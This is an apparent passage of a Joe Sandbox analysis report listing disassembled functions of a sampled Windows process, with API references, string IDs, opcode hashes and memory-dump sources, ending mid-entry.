                                              • Instruction Fuzzy Hash: 0411F876619A41C6EA108B50E4847AAF7A4FB8A768F404625DA8D437B8DF7ED048CB05
                                              Function 00007FF6EB174C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memsetwcsrchr$wcschr
                                              • String ID:
                                              • API String ID: 110935159-0
                                              • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                              • Instruction ID: aead4a5271d757a1fbc08ace71da8e907d736d1e3a24f2baebff2bbe1d7f1ece
                                              • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                              • Instruction Fuzzy Hash: 7651E123B0979285FA218B11E8047F96391BF4EBB8F184130CE5E8B7F4DE7DE145820A
                                              Function 00007FF6EB185EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$CurrentDirectorytowupper
                                              • String ID:
                                              • API String ID: 1403193329-0
                                              • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                              • Instruction ID: c84eb3d0226fb3c19044277cd2847dd635530efb3a7e1e18e635fe20a8f099e2
                                              • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                              • Instruction Fuzzy Hash: 4251C127A0568185EB258F60E9007FA77A0FF4DBACF448035CA4D876A4EF3DE544870A
                                              Function 00007FF6EB1791C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 00007FF6EB17921C
                                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6EB1793AA
                                                • Part of subcall function 00007FF6EB178B20: wcsrchr.MSVCRT ref: 00007FF6EB178BAB
                                                • Part of subcall function 00007FF6EB178B20: _wcsicmp.MSVCRT ref: 00007FF6EB178BD4
                                                • Part of subcall function 00007FF6EB178B20: _wcsicmp.MSVCRT ref: 00007FF6EB178BF2
                                                • Part of subcall function 00007FF6EB178B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB178C16
                                                • Part of subcall function 00007FF6EB178B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB178C2F
                                                • Part of subcall function 00007FF6EB178B20: wcschr.MSVCRT ref: 00007FF6EB178CB3
                                                • Part of subcall function 00007FF6EB18417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB1841AD
                                                • Part of subcall function 00007FF6EB183060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6EB1792AC), ref: 00007FF6EB1830CA
                                                • Part of subcall function 00007FF6EB183060: SetErrorMode.KERNELBASE ref: 00007FF6EB1830DD
                                                • Part of subcall function 00007FF6EB183060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB1830F6
                                                • Part of subcall function 00007FF6EB183060: SetErrorMode.KERNELBASE ref: 00007FF6EB183106
                                              • wcsrchr.MSVCRT ref: 00007FF6EB1792D8
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB179362
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB179373
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                              • String ID:
                                              • API String ID: 3966000956-0
                                              • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                              • Instruction ID: 3d78af6013d4e41d0c93d6ce5e6be472fe2700800e237354b7da768d55881f6c
                                              • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                              • Instruction Fuzzy Hash: 3051A033A0969296EB618F21D8503F963A0FB8EBA8F144035DA0D877E4DF7EE155C706
                                              Function 00007FF6EB172A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$_setjmp
                                              • String ID:
                                              • API String ID: 3883041866-0
                                              • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                              • Instruction ID: a7e11499ce3c82737efe2efa8c15e63ad534600d989b0701a497a51d08a09c8a
                                              • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                              • Instruction Fuzzy Hash: 67518E33608B868AEB61CF20D8503E977A4FB4A758F404135DA4C8BBA8DF7DD645CB46
                                              Function 00007FF6EB17B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB17B4BD
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806D6
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806F0
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB18074D
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB180762
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB17B518
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB17B58B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$_wcsicmp$AllocProcess
                                              • String ID: ELSE$IF/?
                                              • API String ID: 3223794493-1134991328
                                              • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                              • Instruction ID: 4ecfd639badb7d7c9692d92befbe87bbdc9cd53240eb31668fe209f301d186b0
                                              • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                              • Instruction Fuzzy Hash: DE415823A0D66381FA549B24E4213FA26A1AF4E76CF585035DA0EC73F5DF7EE400874A
                                              Function 00007FF6EB19E3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                              • String ID:
                                              • API String ID: 1532185241-0
                                              • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                              • Instruction ID: d27f550a367c2a04a06cbe0a77a67fc87a523bd2846daf9e8267f1c8b28af7e7
                                              • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                              • Instruction Fuzzy Hash: 3F41E433A0879187E7149B21E4457BD7AA1FB8CB64F448535EA0AC37A4CF3DE845CB05
                                              Function 00007FF6EB174FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                              • String ID:
                                              • API String ID: 3588551418-0
                                              • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                              • Instruction ID: df1da2599e1a72d5a78126d29ae598be3ee3754598b874a64c328fba632621e8
                                              • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                              • Instruction Fuzzy Hash: D3419033A08242CBE7549B11E4503BDB661EF8DBA9F144039D60EC77A5CF7EE840874A
                                              Function 00007FF6EB19E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorModememset$FullNamePath_wcsicmp
                                              • String ID:
                                              • API String ID: 2123716050-0
                                              • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                              • Instruction ID: 321507b3bdfb55d4c62833544ebdc456b796fd86ed46305a6c16b0929b9521fb
                                              • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                              • Instruction Fuzzy Hash: 0D418233709BC28AEB718F25D9503E96794FB4D79CF044134DA4D8AAA8DF3DD2488705
                                              Function 00007FF6EB1765F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                              • String ID:
                                              • API String ID: 3114114779-0
                                              • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                              • Instruction ID: 24bd55d70eada3d095f0f70444d2f3d6c0292f28f55eb998ca01bc742d86456b
                                              • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                              • Instruction Fuzzy Hash: 74413633A05B52CAE700CFA5E4403EC37A5FB89798F544035EA0D93BA8DF79E4068745
                                              Function 00007FF6EB19A73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A77A
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A7AF
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A80E
                                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A839
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A850
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: QueryValue$CloseErrorLastOpen
                                              • String ID:
                                              • API String ID: 2240656346-0
                                              • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                              • Instruction ID: ffb029548c0d648dca5e797d9d3cdd78ca19362eb8a50b9959d5b0e6d4a9d468
                                              • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                              • Instruction Fuzzy Hash: 16318233628A8182E7508F15E4406B9B7A4FB8D7A4F544134EA4E83774DF3ED4498B45
                                              Function 00007FF6EB19D0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB1801B8: _get_osfhandle.MSVCRT ref: 00007FF6EB1801C4
                                                • Part of subcall function 00007FF6EB1801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB1801D6
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB19D0F9
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6EB19D10F
                                              • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6EB19D166
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB19D17A
                                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6EB19D18C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                              • String ID:
                                              • API String ID: 3008996577-0
                                              • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                              • Instruction ID: d007d86092f68e37f942bcc0a1fec625e1ecc602c61e8193303210e364682e15
                                              • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                              • Instruction Fuzzy Hash: 9F214B27B14A51CAE7009BB1E4002FD77B0FB4DB68B445125EE0D93B68DF39E044CB19
                                              Function 00007FF6EB195770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CreateSemaphore
                                              • String ID: _p0$wil
                                              • API String ID: 1078844751-1814513734
                                              • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                              • Instruction ID: 45008ca9652760eb1404079e97b845067e79f21fcac3388420307921d374a5ca
                                              • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                              • Instruction Fuzzy Hash: 15510663B197C286EE218F1584543F97290EF8CBA8FA44435DA0D977A5DF3EE405870A
                                              Function 00007FF6EB19B89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF6EB19B934
                                              • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6EB185085), ref: 00007FF6EB19B9A5
                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6EB185085), ref: 00007FF6EB19B9F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                              • String ID: %WINDOWS_COPYRIGHT%
                                              • API String ID: 1103618819-1745581171
                                              • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                              • Instruction ID: a3bab6ffc0421f305a708609079b617eca9dd6ace435842a03f167c34aa8f4f4
                                              • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                              • Instruction Fuzzy Hash: EF41A3A3A1878182EA108F1594103FA73A0FB5DBE8F455235DE9D833A5EF3EE485C705
                                              Function 00007FF6EB1A0774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$_wcslwr
                                              • String ID: [%s]
                                              • API String ID: 886762496-302437576
                                              • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                              • Instruction ID: 177afd252a68ab93ca058ca1520b9aa680b34ba191fc0ba5dba03387951796ac
                                              • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                              • Instruction Fuzzy Hash: 13316933B05B8286EB21CF21D8543E967A0FB8DB98F444035DA8D8B769DF3DE2498705
                                              Function 00007FF6EB1832E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
